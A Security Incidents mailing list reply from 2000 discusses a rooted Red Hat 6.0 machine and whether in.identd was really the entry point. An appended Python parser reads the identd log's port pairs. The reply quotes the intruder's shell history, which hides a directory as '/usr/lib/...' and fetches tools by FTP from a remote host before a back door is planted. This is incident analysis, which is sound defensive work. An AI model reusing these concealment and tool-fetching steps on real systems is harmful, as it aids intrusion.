Security Incidents mailing list archives
Re: Rooted through in.identd on Red Hat 6.0
From: Erich.Meier () INFORMATIK UNI-ERLANGEN DE (Erich Meier)
Date: Thu, 20 Apr 2000 15:58:16 +0200
On Wed, Apr 19, 2000 at 05:02:13AM -0000, Del Elson wrote:
> Hi, A client was hacked last week by what looked like a buffer overflow
> through in.identd. This was on a Red Hat 6.0 box.

Hmmm, I am not so sure that identd is to blame.

> RH don't have any current security notices or fixes for in.identd on
> their servers, and I haven't seen other boxes hacked through in.identd
> recently. The hacker left the usual trace in /.bash_history, which ran
> like:
>
> mkdir /usr/lib/... ; cd /usr/lib/...

Could it be that this ftp connection caused an identd lookup done by the
ftpd at 200.192.58.201? Then in.identd would not be guilty.

> ftp 200.192.58.201 21
> [...]
> ... installing a back door and a partial cover of tracks. The only
> messages in /var/log/messages around the time were:
>
> Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201
> Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
> Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201
> Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
>
> ... the IP address traces back to somewhere in Brazil.
Erich
--
Erich Meier                      Erich.Meier () informatik uni-erlangen de
http://www4.informatik.uni-erlangen.de/~meier/
Dilbert: "Today I started hating people in advance."
Dogbert: "It saves time."
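The argument in this reply rests on reading the port pair in the identd log. An added example (not code from the thread or from any identd implementation) that parses pidentd-style "from: ... for: <port>, <port>" lines and classifies which side opened the connection being queried; it assumes, as RFC 1413 specifies, that the pair is ordered <port-on-server>, <port-on-client>, i.e. local port on the host running identd first, then the port on the querier. The sample log is constructed from the lines quoted above.

```python
import re

# Constructed sample, modelled on the /var/log/messages lines quoted above.
SAMPLE_LOG = """\
Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201
Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201
Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
"""

# pidentd-style "from: <host> ( <ip> ) for: <local port>, <remote port>".
# RFC 1413 orders the pair as <port-on-server>, <port-on-client>, where the
# "server" is the host running identd ("home" here) and the client is the
# querier. Assumption: the log prints the pair in that order, as pidentd does.
QUERY_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ identd\[(?P<pid>\d+)\]: "
    r"from: \S+ \( (?P<querier>[\d.]+) \) for: (?P<lport>\d+), (?P<rport>\d+)$"
)

def classify(lport: int, rport: int) -> str:
    """Which side opened the TCP connection that the ident query is about?"""
    if lport >= 1024 and rport < 1024:
        return "outbound"   # this host connected to a service on the querier
    if lport < 1024 and rport >= 1024:
        return "inbound"    # the querier connected to a service on this host
    return "ambiguous"      # both privileged or both ephemeral: cannot tell

def parse_identd_log(text: str) -> list:
    """Return one record per ident query; 'Connection from' lines carry no ports."""
    events = []
    for line in text.splitlines():
        m = QUERY_RE.match(line)
        if not m:
            continue
        lport, rport = int(m["lport"]), int(m["rport"])
        events.append({
            "ts": m["ts"], "pid": int(m["pid"]), "querier": m["querier"],
            "lport": lport, "rport": rport,
            "direction": classify(lport, rport),
        })
    return events

if __name__ == "__main__":
    for e in parse_identd_log(SAMPLE_LOG):
        print(f'{e["ts"]} pid={e["pid"]} local:{e["lport"]} -> '
              f'{e["querier"]}:{e["rport"]} ({e["direction"]})')
```

For the quoted lines this yields local port 1176 and remote port 21, classified as outbound: the box itself connected to port 21 on 200.192.58.201 and that ftpd asked identd who it was, which is exactly the reading given in the reply.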